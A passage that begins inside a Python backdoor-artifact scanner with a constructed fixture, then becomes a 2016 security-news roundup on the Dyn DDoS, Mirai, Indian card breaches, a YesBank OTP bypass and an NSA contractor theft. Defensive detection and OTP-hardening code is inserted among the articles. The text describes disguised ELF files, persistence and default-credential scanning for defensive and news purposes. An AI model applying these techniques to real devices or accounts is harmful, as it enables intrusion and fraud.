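    return findings


def build_fixture() -> Path:
    """Constructed home directory reproducing the artifacts (not a real sample)."""
    home = Path(tempfile.mkdtemp(prefix="fakefile-demo-"))
    (home / PERSIST_DIR).mkdir(parents=True)
    (home / PERSIST_DIR / "copy.bin").write_bytes(ELF_MAGIC + b"\x00" * 12)  # assumed name
    # Assumed autostart line; the analysis only says a command is written here.
    (home / ".profile").write_text("export PATH=$PATH:$HOME/bin\n"
                                   "$HOME/.gconf/apps/gnome-common/gnome-common &\n")
    (home / "Invoice.pdf").write_bytes(ELF_MAGIC + b"\x00" * 12)   # disguised ELF
    (home / ".Invoice.pdf").write_bytes(b"%PDF-1.4\n%decoy\n")     # hidden decoy
    (home / "Documents").mkdir()
    (home / "Documents" / "Report.pdf").write_bytes(b"%PDF-1.4\n%benign\n")
    return home


if __name__ == "__main__":
    for key, value in scan_home(build_fixture()).items():
        print(f"{key}: {value}")
```

Run it against each real home directory with that user's privileges; the magic-byte check matters more than the extension list, since a file named like a document but starting with ELF is suspicious regardless of which family dropped it.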
Technical details of this Linux backdoor are available here.
NewWorldHacking and Anonymous behind massive DDoS attack on Dyn DNS service
22.10.2016 securityaffairs Attack
NewWorldHacking & Anonymous powered the massive DDoS attack against the Dyn DNS service that caused a serious Internet outage for many netizens.
The cyber attacks against the Dyn DNS service that affected a huge portion of Internet users in the US is monopolizing the media.
IT security experts have no doubts, hackers powered the massive DDoS attack with a huge botnet composed of IoT devices infected by the Mirai malware.
We are all trying to discover who is behind the attack and which is its motivation. On Friday, while the massive DDoS attack was creating the panic among netizens on the Internet, WikiLeaks invited its supporters to stop the offensive.
WikiLeaks ✔ @wikileaks
Mr. Assange is still alive and WikiLeaks is still publishing. We ask supporters to stop taking down the US internet. You proved your point.
23:09 - 21 Oct 2016
WikiLeaks confirmed that its supporters launched the massive DDoS attack to protest the Ecuadorian government's decision to cut off the Internet connection of WikiLeaks founder Julian Assange over the US political election leaks.
Yesterday evening I reached the hacking collective NewWorldHacking via Twitter, asking them for more information about the attack.
The hackers confirmed to me that they started the massive attack against the Dyn DNS service; however, they were not alone.
According to NewWorldHacking, many other groups linked to the Anonymous collective participated in the attack.
When I asked which Anon groups were involved, they replied that many crews targeted the Dyn DNS service.
“Anonymous, pretty much all of Anonymous,” said NewWorldHacking.
They confirmed to me that they are testing the capability of their botnet, highlighting that the DDoS attack against the Dyn DNS service was carried out with the Mirai botnet alongside other booters.
Most interesting is the motivation they gave me. It was not only Assange's case: they told me the attack is also a message for the Russian Government.
“If Russia is against the U.S we are against Russia. This is where we draw the line, we are sending a warning message to Russia.”
The information I collected seems to be in line with the statements that the hacktivist groups Anonymous and NewWorldHacking released to Politico.
Indian Banks fear a security breach that affected up to 3.25 million cards
22.10.2016 securityaffairs Crime
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards.
A number of Indian banks are adopting extraordinary measures fearing a security breach that could have exposed as many as 3.25 million debit cards (0.5 percent of the nearly 700 million debit cards issued by banks in India).
“A slew of banks in India are replacing or asking their customers to change security codes of as many as 3.25 million debit cards due to fears that the card data may have been stolen in one of the country’s largest-ever cyber security incidents.” reported the Reuters.
In September, several banks' customers reported fraudulent activity involving their debit cards to Visa, Mastercard and RuPay (National Payments Corp of India, NPCI). According to the chief of NPCI, the fraudulent transactions spotted by customers were observed mostly in China and the United States.
A.P. Hota, NPCI Chief Executive, explained that one of the payment switch providers' systems might have been compromised. Looking closely at the numbers behind this security breach, which involved some 90 ATMs, 2.65 million of the cards are on the Visa and MasterCard platforms.
Both Visa and Mastercard issued a statement to confirm that their networks had not been hacked and confirmed their support to the ongoing investigation.
The switches are crucial components of the back-end network of a bank and are involved in ordinary ATM operations.
The card network providers already reported the issue to the affected banks that decided as a preventive measure to replace customers’ cards.
“Necessary corrective actions already have been taken and hence there is no reason for bank customers to panic,” said Hota, playing down the problem.
According to Reuters, the NPCI did not disclose the name of the payment switch provider that was compromised; however, banking industry sources revealed that it is the Hitachi Ltd subsidiary Hitachi Payment Services, which manages ATM network processing for Yes Bank Ltd.
Yes Bank issued a statement to confirm it is reviewing the security, but its experts haven’t found any anomaly.
The State Bank of India promptly blocked the debit cards of some customers and is now replacing those cards to prevent fraudulent activity.
Reuters provided further details about the possible impact on Indian bank customers:
“Complaints of fraudulent cash withdrawals affected a total 641 customers of 19 banks, and the money involved was 13 million rupees ($194,612), according to NPCI.” reported the Reuters.
“ICICI Bank (ICBK.NS), HDFC Bank (HDBK.NS) and Axis Bank (AXBK.NS) – the top three private sector lenders – confirmed in separate statements some of their customers’ card accounts had been possibly breached after use at outside ATMs. The banks said they had advised the clients to change their PINs.”
“Standard Chartered’s (STAN.L) Indian unit has also begun to re-issue debit cards for some customers”
An Army of Million Hacked IoT Devices Almost Broke the Internet Today
22.10.2016 thehackernews Hacking
A massive Distributed Denial of Service (DDoS) attack against Dyn, a major domain name system (DNS) provider, broke large portions of the Internet on Friday, causing a significant outage to a ton of websites and services, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify.
But how did the attack happen? What is the cause behind it?
Exact details of the attack remain vague, but Dyn reported a huge army of hijacked internet-connected devices could be responsible for the massive attack.
Yes, the same method recently employed by hackers to carry out record-breaking DDoS attack of over 1 Tbps against France-based hosting provider OVH.
According to security intelligence firm Flashpoint, Mirai bots were detected driving much, but not necessarily all, of the traffic in the DDoS attacks against DynDNS.
Mirai is a piece of malware that targets Internet of Things (IoT) devices such as routers, security cameras and DVRs, and enslaves vast numbers of these compromised devices into a botnet, which is then used to conduct DDoS attacks.
Since the source code of the Mirai botnet has already been made available to the public, anyone can wield DDoS attacks against targets.
This time hackers did not target an individual site; rather, they attacked Dyn, which many sites and services use as their upstream DNS provider for translating human-readable website names into Internet Protocol (IP) addresses.
The result we all know: major sites and services including Twitter, GitHub, Reddit, PayPal, Amazon, Airbnb, Netflix, Pinterest and so on were among hundreds of services rendered inaccessible to millions of people worldwide for several hours on Friday.
"Flashpoint has confirmed that at least some of the devices used in the Dyn DNS attacks are DVRs, further matching the technical indicators and tactics, techniques, and procedures associated with previous known Mirai botnet attacks," Flashpoint says in a blog post.
This type of attack is notable and concerning because it largely consists of unsecured IoT devices, whose numbers are growing exponentially. These devices are deployed in a way that makes them hard to update and thus nearly impossible to secure.
Manufacturers focus mainly on the performance and usability of IoT devices but neglect security measures and encryption, which is why the devices are routinely hacked and increasingly become part of DDoS botnets used as weapons in cyber attacks.
An online tracker of the Mirai botnet suggests there are more than 1.2 million Mirai-infected devices on the Internet, with over 166,000 devices active right now.
In short, IoT botnets like Mirai are growing rapidly, and there is no easy way to stop them.
According to officials speaking to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks hitting DynDNS, but neither agency has yet speculated on who might be behind them.
Massive DDoS attack against Dyn DNS service, how and why
22.10.2016 securityaffairs Attack
A massive DDoS attack targeted the Dyn DNS service and caused an extended Internet outage. How did the attackers power the attack?
Yesterday a massive DDoS attack targeted the DNS service of the Dyn company, one of the most authoritative domain name system (DNS) providers, and caused an extended Internet outage. A large portion of Internet users was not able to reach the most important web services; many websites, including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify, were down for netizens in the US.
What happened? Who is behind the attack?
The fear of a cyber attack on a global scale caused panic; yesterday a large portion of users probably understood that the Internet architecture is a resource that can be targeted by hackers with serious and unpredictable consequences.
But how did the attack happen? What was the cause behind it?
We still do not know the exact dynamics of the attack, nor who is responsible; the only certainty is that the Dyn DNS service was flooded by a devastating wave of requests originating from millions of compromised IoT devices. Dyn reported that a huge army of hijacked Internet of Things devices could have been abused by attackers to power the massive DDoS attack.
The news confirms the dangerous trend observed in the recent attacks against Brian Krebs’s website and the French hosting provider OVH, which peaked at 1 Tbps.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which it confirms that its experts observed Mirai bots driving the attack against DynDNS.
“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “
Below are the key findings of the report published by Flashpoint:
Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
This is not surprising if we consider that the source code of the botnet was leaked on the popular criminal hacking forum Hackforums earlier in October by a user with the moniker “Anna-senpai”, who shared the link to the source code of the “Mirai” malware.
“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.
The Mirai botnet was first spotted by the researcher MalwareMustDie this summer targeting IoT devices; it mainly targets connected objects such as routers, CCTV cameras, and DVRs.
The Mirai malware targets Internet of Things (IoT) devices that still use factory-default credentials, a circumstance that is quite common in the wild.
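How a defender sees that spreading behaviour in device logs, as an added example (not code from the article or from Mirai): a detector that flags a single source cycling through several usernames against a device's telnet login within a short window, and then a successful login from that same source. The log line format, the thresholds and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Constructed log format (assumption):
#   "<ISO ts> telnetd: login src=<ip> user=<name> result=OK|FAIL"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) telnetd: login "
    r"src=(?P<src>[\d.]+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

WINDOW = timedelta(seconds=60)   # sliding window per source (assumed)
MAX_FAILS = 5                    # failures inside the window that trip an alert (assumed)
MIN_DISTINCT_USERS = 3           # a scanner cycles through several default accounts (assumed)


def parse_line(line):
    """Return (timestamp, src_ip, user, success) or None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ts, m["src"], m["user"], m["result"] == "OK"


def detect_credential_scans(lines):
    """Return alerts in log order.

    ('<ip>', 'scan', n)       -- n failures with >= MIN_DISTINCT_USERS usernames
                                 from one source inside WINDOW (reported once)
    ('<ip>', 'compromise', u) -- a source already flagged as scanning then logged
                                 in successfully as user u (the device is likely owned)
    A legitimate user mistyping one account's password a few times trips neither rule.
    """
    failures = defaultdict(deque)   # src -> deque of (ts, user) inside WINDOW
    flagged = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, user, success = parsed
        if success:
            if src in flagged:
                alerts.append((src, "compromise", user))
            continue
        window = failures[src]
        window.append((ts, user))
        while ts - window[0][0] > WINDOW:   # drop failures older than the window
            window.popleft()
        distinct_users = {u for _, u in window}
        if (len(window) >= MAX_FAILS and len(distinct_users) >= MIN_DISTINCT_USERS
                and src not in flagged):
            flagged.add(src)
            alerts.append((src, "scan", len(window)))
    return alerts


# Constructed sample: one scanner that succeeds, one forgetful user, and one
# slow source whose early failures age out of the window (TEST-NET addresses).
SAMPLE_LOG = """\
2016-10-21T11:10:00Z telnetd: login src=203.0.113.5 user=root result=FAIL
2016-10-21T11:10:01Z telnetd: login src=203.0.113.5 user=admin result=FAIL
2016-10-21T11:10:02Z telnetd: login src=203.0.113.5 user=root result=FAIL
2016-10-21T11:10:03Z telnetd: login src=203.0.113.5 user=support result=FAIL
2016-10-21T11:10:04Z telnetd: login src=203.0.113.5 user=admin result=FAIL
2016-10-21T11:10:05Z telnetd: login src=203.0.113.5 user=root result=OK
2016-10-21T11:10:10Z telnetd: login src=198.51.100.7 user=alice result=FAIL
2016-10-21T11:10:20Z telnetd: login src=198.51.100.7 user=alice result=FAIL
2016-10-21T11:10:30Z telnetd: login src=198.51.100.7 user=alice result=OK
2016-10-21T11:15:00Z telnetd: login src=192.0.2.9 user=root result=FAIL
2016-10-21T11:15:01Z telnetd: login src=192.0.2.9 user=admin result=FAIL
2016-10-21T11:18:00Z telnetd: login src=192.0.2.9 user=user result=FAIL
2016-10-21T11:18:01Z telnetd: login src=192.0.2.9 user=root result=FAIL
2016-10-21T11:18:02Z telnetd: login src=192.0.2.9 user=admin result=FAIL
""".splitlines()

if __name__ == "__main__":
    for alert in detect_credential_scans(SAMPLE_LOG):
        print(alert)
```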
The availability of the Mirai botnet source code in the wild theoretically makes it possible for anyone to power a botnet.
I confess that I believe the leak of the source code of such a botnet could also be part of a wider strategy of a certain category of attackers who intend to power massive attacks while making attribution impossible.
Watch out! The Mirai botnet that powered the attack against the Dyn DNS service is not the same one used against Krebs’s site and OVH.
“While Flashpoint has confirmed that Mirai botnets were used in the October 21, 2016 attack against Dyn, they were separate and distinct botnets from those used to execute the DDoS attacks against “Krebs on Security” and OVH. Earlier this month, “Anna_Senpai,” the hacker operating the large Mirai botnet used in the Krebs DDoS, released Mirai’s source code online.” continues Flashpoint “Since this release, copycat hackers have used the malware to create botnets of their own in order to launch DDoS attacks.”
It is unknown if the attacks against Dyn DNS are linked to the DDoS attacks against Krebs, OVH, or other previous attacks.
An attack against a DNS provider aims to obtain a wide effect; in this specific case many sites and services use Dyn as their upstream DNS provider.
If you want to know more about the spread of the Mirai botnet, you can use this online tracker, which reports more than 1.2 million connected devices infected by the Mirai code in the wild.
According to Reuters, the US Department of Homeland Security (DHS) and the FBI are both investigating the massive DDoS attacks against the Dyn DNS service.
We have no indication about the possible culprit; I personally believe that the leak of the Mirai botnet in the wild and this latest massive attack have something in common, and that there is a specific strategy of a persistent attacker behind the events.
Chinese hackers targeted officials visiting the USS Ronald Reagan vessel
22.10.2016 securityaffairs Hacking
Experts from the cyber security firm FireEye discovered a spear phishing campaign launched against visitors to the USS Ronald Reagan in the South China Sea.
Chinese hackers targeted foreign government personnel who visited a US aircraft carrier the day before a contentious international court ruling on the South China Sea.
According to the cyber security firm FireEye, the hackers launched the attack against visitors to the US vessel on the day before the ruling (July 11, 2016).
According to the experts at FireEye’s iSight unit, the Chinese hackers powered a spear phishing attack that leveraged messages carrying a malicious document as an attachment. The document impersonated an official message sent to officials visiting the USS Ronald Reagan, a nuclear-powered aircraft carrier that the US Government used to patrol the South China Sea in July.
The document allowed the attackers to infect victims with the Enfal malware, which can be used as spyware or to download further malicious payloads onto the machine.
According to FireEye, the same hackers are responsible for other attacks against US and Vietnamese national defence computer networks.
The Financial Times, which reported the discovery made by FireEye, noted the absence of direct evidence linking the attack to a Chinese nation-state actor. The researchers found that the command-and-control server used by the attackers had previously been used by the China-based group.
“Many governments and militaries in Southeast Asia lack cyber security controls that can effectively match these elevated threats,” said Bryce Boland, FireEye’s Asia-Pacific chief technology officer.
“For example, personal webmail and unmanaged devices aren’t unusual, and many organisations lack the technology to detect unique attacks which haven’t been seen before.”
At the time of writing it is still unclear whether the hackers compromised classified information or interfered with the vessel’s operations in the South China Sea.
“The official said unclassified information about logistics was often shared with contractors and foreign governments to support port visits for ships.” reported the FT.
Huge card heist of millions of banking records. The trail leads to China
22.10.2016 Novinky/Bezpečnost Crime
Using a computer virus that targeted ATMs and payment terminals in shops directly, cybercriminals obtained detailed information on more than 3.2 million payment cards. They can easily abuse the obtained data for unauthorised payments and withdrawals from other people’s accounts. According to The Hacker News, it is the largest recorded theft of its kind.
The deployment of the virus through which the computer pirates obtained detailed payment card information was uncovered in India. The cybercriminals managed to outwit the security of practically all of the large financial institutions there: the State Bank of India (SBI), HDFC, Yes Bank, ICICI and Axis.
That does not mean, however, that only users in India are at risk. Given the careful work of the computer pirates, it is very likely that they tried to obtain card information in the same way in other parts of the world as well.
Through the uninvited guest, the attackers obtained at least the PIN code, the card number and the cardholder’s name.
Investigators have not yet revealed whether the malicious code only scanned the card itself or also tapped directly into the communication between the terminal and the bank. It is therefore quite possible that the attackers have far more information about the stolen cards at their disposal.
How did the viruses get into the ATMs?
The Economic Times also pointed out that although investigators managed to uncover the uninvited guest, they have so far been unable to determine how it got into the ATMs and payment terminals.
What is especially striking is that the cybercriminals managed to outwit the security systems of several different financial institutions.
So far the investigators’ only lead is the payment platform used: practically all of the affected banks used systems from Hitachi.
A total of 3.2 million detailed payment card records were stolen, of which 2.6 million are Visa and Mastercard cards. The remaining 600 thousand stolen records belong to the Indian RuPay platform.
How long the computer pirates had access to the banking systems is not yet clear.
The trail leads to China
According to investigators, the trail of the attack leads to China. It was in the most populous country on the planet that money was withdrawn without authorisation from the affected accounts. The individual financial institutions have not yet quantified the extent of the damage. Given the number of stolen cards, however, the sums are unlikely to be small.
The affected banks have already reacted to the threat. Some financial institutions recommended that users change the PIN codes of their cards immediately; others started blocking the cards outright.
Users thus cannot reach their money as easily, but on the other hand neither can the computer pirates. New cards will of course be issued to users free of charge.
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline
21.10.2016 thehackernews Attack
Cyber attacks are getting nastier and becoming a worse nightmare for companies day by day, and the Distributed Denial of Service (DDoS) attack is one such attack that can cause massive damage to any service.
Recently, the Internet witnessed a record-breaking DDoS attack of over 1 Tbps against the France-based hosting provider OVH, and now the latest victim of such an attack is none other than the DNS provider Dyn.
A sudden outage of popular sites and services, including Twitter, SoundCloud, Spotify, and Shopify, for many users, is causing uproar online. It's because of a DDoS attack against the popular Domain Name System (DNS) service provider Dyn, according to a post on Ycombinator.
DNS acts as the authoritative reference for mapping domain names to IP addresses. In other words, DNS is simply the Internet's phone book, resolving human-readable web addresses, like thehackernews.com, to IP addresses.
Dyn DNS is used by many websites and services as their upstream DNS provider, including Twitter, Spotify, SaneBox, Reddit, Box, Github, Zoho CRM, PayPal, Airbnb, Freshbooks, Wired.com, Pinterest, Heroku and Vox Media properties.
All of these sites and services are reportedly experiencing outages and downtime, either completely or partially.
Here's an internet outage map from Level3:
According to Dyn DNS, the DDoS started at 11:10 UTC and is mostly affecting its customers on the East Coast of the United States, specifically Managed DNS customers.
"We are aware of the ongoing service interruption of our Managed DNS network. For more information visit our status page," Dyn tweeted.
At the time of writing, it's not clear who is behind this DDoS attack, but the company said its engineers are working on "mitigating" the issue.
Here's the statement posted by Dyn on its website:
"This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.
Customers with questions or concerns are encouraged to reach out to our Technical Support Team."
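What Dyn's statement describes looks, from an authoritative DNS operator's seat, like a sudden jump in queries per second from a very large number of clients. The following added example (not Dyn's code or the article's) buckets BIND-style query-log lines per second, derives a baseline from the quiet seconds, and labels flooded seconds as distributed or single-source; the log format, thresholds and sample lines are constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

# Constructed query-log format (assumption, modelled on BIND 9 querylog):
#   "21-Oct-2016 11:10:00.123 client 203.0.113.5#40000: query: twitter.com IN A +"
QUERY_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d+) client (?P<src>[\d.]+)#\d+: "
    r"query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def bucket_queries(lines):
    """Group matching lines by whole second: {second: [count, {sources}, Counter(qname)]}."""
    buckets = defaultdict(lambda: [0, set(), Counter()])
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m is None:
            continue
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f").replace(microsecond=0)
        bucket = buckets[ts]
        bucket[0] += 1
        bucket[1].add(m["src"])
        bucket[2][m["qname"].lower()] += 1
    return buckets


def detect_flood(lines, baseline_seconds=5, factor=10, min_abs=20, min_sources=50):
    """Return [(second_iso, qps, distinct_sources, kind, top_qname)] for flooded seconds.

    The baseline is the median QPS of the first `baseline_seconds` buckets, which are
    assumed to be quiet; a second is flooded when its QPS is at least `factor` times
    that baseline and at least `min_abs`. `kind` separates a botnet-style flood
    (many distinct clients) from a single noisy client, which calls for a different
    mitigation (upstream filtering vs. a per-client rate limit).
    """
    buckets = bucket_queries(lines)
    seconds = sorted(buckets)
    baseline = median(buckets[s][0] for s in seconds[:baseline_seconds]) if seconds else 0
    threshold = max(min_abs, factor * baseline)
    alerts = []
    for s in seconds:
        count, sources, names = buckets[s]
        if count < threshold:
            continue
        kind = "distributed" if len(sources) >= min_sources else "single-source"
        alerts.append((s.isoformat(), count, len(sources), kind, names.most_common(1)[0][0]))
    return alerts


def constructed_sample_log():
    """Constructed sample: five quiet seconds at 3 QPS, then two seconds in which
    300 distinct TEST-NET clients each send one query for the same name."""
    lines = []
    for sec in range(5):
        for i in range(3):
            lines.append(f"21-Oct-2016 11:09:5{sec}.{i:03d} client 192.0.2.{10 + i}#5353{i}: "
                         f"query: example.com IN A +")
    for sec in range(2):
        for i in range(300):
            src = f"203.0.113.{i}" if i < 256 else f"198.51.100.{i - 256}"
            lines.append(f"21-Oct-2016 11:10:0{sec}.{i:03d} client {src}#{40000 + i}: "
                         f"query: twitter.com IN A +")
    return lines


if __name__ == "__main__":
    for alert in detect_flood(constructed_sample_log()):
        print(alert)
```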
What websites are down for you? Let us know in the comments below.
We'll update the story as soon as we get to hear more about the attack. Stay Tuned!
US users were not able to reach Twitter and other sites due to DDoS on Dyn DNS Service
21.10.2016 securityaffairs Attack
A severe distributed denial-of-service (DDoS) attack is targeting the Managed DNS infrastructure of the cloud-based Internet performance management company Dyn.
Many users are not able to reach major web services. The list of affected websites includes Twitter, Etsy, GitHub, Soundcloud, PagerDuty, Spotify, Shopify, Airbnb, Intercom, and Heroku.
GitHub has notified its users that its upstream DNS provider is suffering a serious issue. In some regions of the world Twitter.com was not accessible, as reported by SecurityWeek.
“At the time of writing, website availability services show that Twitter.com has been down for roughly two hours.” states a blog post published by SecurityWeek.
Dyn confirmed the DDoS attack against its DNS service that started at 11:10 UTC. The company is still working on mitigating the attack.
“Services have been restored to normal as of 13:20 UTC.
This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.”
The attack seems to have had no impact on European and Asian users; I live in Italy and here we had no problems reaching the affected websites.
DDoS attacks continue to represent a serious threat against the web services and the overall Internet infrastructure.
Recent attacks powered by the Mirai botnet reached a magnitude never seen before; the attack targeting the hosting provider OVH last month peaked at 1 Tbps.
In early September the popular cyber security expert Bruce Schneier published an interesting post titled “Someone Is Learning How to Take Down the Internet”, which revealed an escalation of cyber attacks against service providers and companies responsible for the basic infrastructure of the Internet.
We are referring to coordinated attacks that experts consider a sort of test to evaluate the resilience of the most critical nodes of the global Internet. The attacks experienced by these companies require significant effort and huge resources, a circumstance that suggests the involvement of a persistent attacker such as a government, and China is the first suspect.
“Recently, some of the major companies that provide the basic infrastructure that makes the Internet work have seen an increase in DDoS attacks against them. Moreover, they have seen a certain profile of attacks. These attacks are significantly larger than the ones they’re used to seeing. They last longer. They’re more sophisticated. And they look like probing.” wrote Schneier.
“I am unable to give details, because these companies spoke with me under a condition of anonymity. But this all is consistent with what Verisign is reporting. Verisign is the registrar for many popular top-level Internet domains, like .com and .net. If it goes down, there’s a global blackout of all websites and e-mail addresses in the most common top-level domains. Every quarter, Verisign publishes a DDoS trends report. While its publication doesn’t have the level of detail I heard from the companies I spoke with, the trends are the same: “in Q2 2016, attacks continued to become more frequent, persistent, and complex.””
It is clear that attackers aim to cause a global blackout of the most common top-level domains paralyzing a large portion of the Internet.
Schneier, who has spoken with companies that faced the attacks, pointed out powerful DDoS attacks that stand out from the ordinary for their methodically escalating nature.
Cyber criminals can easily get access to your YesBank Internet Banking using a stolen Debit/Credit Card Number and PIN
21.10.2016 securityaffairs Cyber
A security researcher disclosed a vulnerability in the online banking service of YesBank, which promptly fixed the issue.
I am a customer of YesBank and I hold my savings account with them. I also use YesBank’s online banking application, and I strongly feel that the bank’s application must be secured. So, as a responsible client, I disclosed to YesBank the vulnerability I recently found in their application. And I would like to thank YesBank for fixing this issue immediately.
For those who do not know about YesBank, you can read about the bank on Wikipedia.
“YES BANK is India’s fifth largest private sector Bank, founded in 2004. Yes Bank is the only Greenfield Bank licence awarded by the RBI in the last two decades. YES BANK is a “Full Service Commercial Bank”, and has steadily built a Corporate, Retail & SME Banking franchise, Financial Markets, Investment Banking, Corporate Finance, Branch Banking, Business and Transaction Banking, and Wealth Management business lines across the country.”
Introduction
I regularly perform penetration testing on applications at SecureLayer7, and recently I stumbled on a very simple bug in the YesBank online banking application (referred to as YesBank in the rest of this article). YesBank provides a good number of features to millions of banking users. Among these features, I found that the user account password reset feature was vulnerable to one of OWASP’s Top 3 vulnerabilities, i.e. injection.
This vulnerability is caused by poor input validation in the application. Consequently, an attacker can exploit it to bypass the OTP process and reset the bank account password. To exploit this vulnerability, the attacker needs information about the victim’s bank account, for example their ATM card number, ATM PIN, etc.
Several Indian banks are issuing advisories to their customers, asking them to change their security code (more popularly known as the ATM PIN) or, better, replace the card, according to Indian media reports.
Once the attacker has gathered all the information required to exploit this vulnerability, he can gain access to the Online Banking Application account by resetting the user’s original password.
The Proof of Concept
To execute the payload successfully, switch the mobile’s flight mode OFF or ON. (Banking user information is blurred for security reasons.)
Vulnerability Timeline:
1) Vulnerability reported to YesBank on 21st September 2016
2) Vulnerability re-tested on 20th October 2016; it was patched
Takeaway:
I always recommend implementing universal input validation against the commonly known vulnerabilities; banking applications in particular should apply every type of input validation to untrusted user input.
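One way to apply that takeaway to the OTP step, as an added example (not YesBank’s code; the article does not show the flawed handler): the submitted code is treated as untrusted input that must match a strict whitelist before anything else happens, is bound to the session that requested it, expires, is single-use, is compared in constant time and is limited to a few attempts. The class, parameter names and limits are assumptions.

```python
import hmac
import re
import secrets
import time
from dataclasses import dataclass

# Whitelist: exactly six ASCII digits. (str.isdigit() would also accept Unicode
# digits and is not used for that reason.)
OTP_RE = re.compile(r"[0-9]{6}")
OTP_TTL_SECONDS = 300   # assumed lifetime of a reset code
MAX_ATTEMPTS = 3        # assumed failures allowed per challenge


@dataclass
class ResetChallenge:
    account_id: str
    code: str
    issued_at: float
    attempts: int = 0
    consumed: bool = False


class OtpStore:
    """In-memory store of outstanding password-reset challenges, keyed by session."""

    def __init__(self, clock=time.time):
        self._clock = clock        # injectable so expiry can be tested deterministically
        self._by_session = {}

    def issue(self, session_id, account_id):
        """Create a fresh code bound to this session; the caller delivers it out-of-band."""
        code = f"{secrets.randbelow(10**6):06d}"
        self._by_session[session_id] = ResetChallenge(account_id, code, self._clock())
        return code

    def verify(self, session_id, submitted):
        """Return (ok, reason). Validation runs before any lookup, so payloads with
        quotes, wildcards, whitespace or NULs never reach the data layer, and every
        failure path fails closed."""
        if not isinstance(submitted, str) or OTP_RE.fullmatch(submitted) is None:
            return False, "malformed"
        challenge = self._by_session.get(session_id)
        if challenge is None or challenge.consumed:
            return False, "no-challenge"
        if self._clock() - challenge.issued_at > OTP_TTL_SECONDS:
            del self._by_session[session_id]
            return False, "expired"
        if challenge.attempts >= MAX_ATTEMPTS:
            del self._by_session[session_id]   # force a new challenge after lock-out
            return False, "locked"
        challenge.attempts += 1
        # Constant-time comparison so response timing does not leak matching prefixes.
        if not hmac.compare_digest(challenge.code.encode(), submitted.encode()):
            return False, "mismatch"
        challenge.consumed = True   # single use: a replayed code is refused
        return True, "ok"
```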
Reference : http://blog.securelayer7.net/yesbank-banking-application-password-reset-otp-bypass-vulnerability/
US contractor stole an astonishing quantity of data, including Equation Group tools
21.10.2016 securityaffairs BigBrothers
The US DoJ has charged the US contractor Harold Thomas Martin with theft of secret documents and highly classified government material.
A couple of months ago, the FBI announced the arrest of an NSA contractor, Harold Thomas Martin III, over a massive secret data theft.
The US DoJ has charged Harold Thomas Martin (51) with theft of secret documents and highly classified government material.
According to the court complaint, the stolen data include source code developed by the NSA for its hacking campaigns against foreign governments.
The DoJ’s chief national security prosecutor John Carlin revealed that the US contractor was employed by Booz Allen Hamilton, the same defense contractor that employed the notorious Edward Snowden at the time the whistleblower disclosed the mass surveillance program conducted by the NSA on a global scale.
Now, according to a new court document filed this week, the FBI seized at least 50 terabytes of data that the suspect had stolen from government systems since 1996.
According to the prosecutors, Harold Thomas Martin III has stolen an ‘astonishing quantity’ of documents, a huge trove of data containing at least 500 million pages of government records, including top-secret information about “national defense.”
“The defendant violated that trust by engaging in wholesale theft of classified government documents and property — a course of felonious conduct that is breathtaking in its longevity and scale,” prosecutors said. “The defendant was in possession of an astonishing quantity of marked classified documents which he was not entitled to possess, including many marked,” “The government anticipates that the charges will include violations of the Espionage Act, an offense that carries significantly higher statutory penalties and advisory guideline ranges than the charges listed in the complaint,” prosecutors added.
US contractor cyber heist
The volume of classified information stolen by the man could be far larger than Edward Snowden’s cyber heist. The investigators have discovered “six full bankers’ boxes” worth of documents, many of which were classified as “Secret” and “Top Secret.”
“The document appears to have been printed by the Defendant from an official government account,” read the court documents. “On the back of the document are handwritten notes describing the NSA’s classified computer infrastructure and detailed descriptions of classified technical operations.”
The New York Times reported that the stolen documents also included the NSA’s top secret hacking tools that were leaked online by the Shadow Brokers group who claimed the responsibility for the Equation Group hack.
